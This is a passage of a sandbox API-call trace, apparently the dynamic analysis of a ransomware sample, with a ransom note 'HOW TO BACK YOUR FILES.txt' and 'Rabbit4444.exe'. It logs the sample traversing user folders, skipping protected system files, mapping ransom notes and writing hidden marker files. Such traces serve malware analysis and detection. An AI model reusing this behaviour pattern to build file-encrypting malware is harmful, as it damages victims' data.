(hObject=0x27c) returned 1 [0052.861] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network") returned 49 [0052.861] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.861] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8d31ff5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0052.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.861] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.861] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.861] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.861] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8d31ff5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.861] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.861] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.861] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.861] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.862] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.862] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8d31ff5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8d31ff5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8d581c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.862] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.862] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.862] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb0d62598, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="Rabbit4444.exe") returned -1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2=".") returned 1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="..") returned 1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="windows") returned -1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="bootmgr") returned 1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="pagefile.sys") returned -1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="boot") returned 1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="ids.txt") returned -1 [0052.862] lstrcmpiW (lpString1="Connections", lpString2="NTUSER.DAT") returned -1 [0052.862] lstrcpyW (in: lpString1=0x130eb9c, lpString2="Connections" | out: lpString1="Connections") returned="Connections" [0052.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x101ea8 [0052.862] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6430 [0052.862] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb0d62598, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0052.862] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0052.864] lstrcpyW (in: lpString1=0x130eb9c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.864] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.866] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.866] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.866] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.866] CloseHandle (hObject=0x278) returned 1 [0052.866] CloseHandle (hObject=0x27c) returned 1 [0052.866] GetCurrentThreadId () returned 0xd98 [0052.866] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.867] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0052.867] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0052.867] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0052.867] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0052.867] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3" [0052.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.869] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.872] FlushFileBuffers (hFile=0x27c) returned 1 [0052.873] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.873] CloseHandle (hObject=0x27c) returned 1 [0052.873] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 61 [0052.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.873] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8d581c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0052.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.874] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.874] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.874] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.874] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8d581c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.874] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.874] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.874] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.874] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.874] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.874] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8d581c6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8d581c6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8d581c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.874] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.874] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.874] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae631a53, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cm", cAlternateFileName="")) returned 1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="Rabbit4444.exe") returned -1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2=".") returned 1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="..") returned 1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="windows") returned -1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="bootmgr") returned 1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="pagefile.sys") returned -1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="boot") returned 1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="ids.txt") returned -1 [0052.874] lstrcmpiW (lpString1="Cm", lpString2="NTUSER.DAT") returned -1 [0052.874] lstrcpyW (in: lpString1=0x130ebb4, lpString2="Cm" | out: lpString1="Cm") returned="Cm" [0052.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x82) returned 0x1057c0 [0052.874] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6430 [0052.875] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38f794c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="Rabbit4444.exe") returned -1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2=".") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="..") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="windows") returned -1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="bootmgr") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="pagefile.sys") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="boot") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="ids.txt") returned 1 [0052.875] lstrcmpiW (lpString1="Pbk", lpString2="NTUSER.DAT") returned 1 [0052.875] lstrcpyW (in: lpString1=0x130ebb4, lpString2="Pbk" | out: lpString1="Pbk") returned="Pbk" [0052.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0052.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x84) returned 0x106540 [0052.875] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xea710 [0052.875] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae631a53, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddencm", cAlternateFileName="_HIDDE~2")) returned 1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="Rabbit4444.exe") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2=".") returned 1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="..") returned 1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="windows") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="bootmgr") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="pagefile.sys") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="boot") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="ids.txt") returned -1 [0052.875] lstrcmpiW (lpString1="_hiddencm", lpString2="NTUSER.DAT") returned -1 [0052.875] lstrcpyW (in: lpString1=0x130ebb4, lpString2="_hiddencm" | out: lpString1="_hiddencm") returned="_hiddencm" [0052.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0052.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11e6d8 [0052.875] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6930 | out: ListHead=0xf68b0, ListEntry=0xf6930) returned 0xf64b0 [0052.875] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae631a53, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddencm", cAlternateFileName="_HIDDE~2")) returned 0 [0052.875] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0052.876] lstrcpyW (in: lpString1=0x130ebb4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.876] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.876] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.876] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.876] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.876] CloseHandle (hObject=0x278) returned 1 [0052.876] CloseHandle (hObject=0x27c) returned 1 [0052.876] GetCurrentThreadId () returned 0xd98 [0052.876] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6930 [0052.876] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" [0052.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e6d8 | out: hHeap=0xe0000) returned 1 [0052.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6928 | out: hHeap=0xe0000) returned 1 [0052.877] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" [0052.877] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\" [0052.877] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3" [0052.877] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\_hiddencm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.878] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.880] FlushFileBuffers (hFile=0x27c) returned 1 [0052.881] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.881] CloseHandle (hObject=0x27c) returned 1 [0052.882] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned 71 [0052.882] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.882] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0052.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.882] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.882] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.882] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.882] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.882] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.882] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.882] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.882] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.882] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.882] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8d7e489, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8d7e489, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.882] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.882] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.882] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8d7e489, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8d7e489, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8d7e489, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.882] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0052.882] lstrcpyW (in: lpString1=0x130ebc8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.882] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\_hiddencm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.883] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.883] MapViewOfFile (hFileMappingObject=0x278, 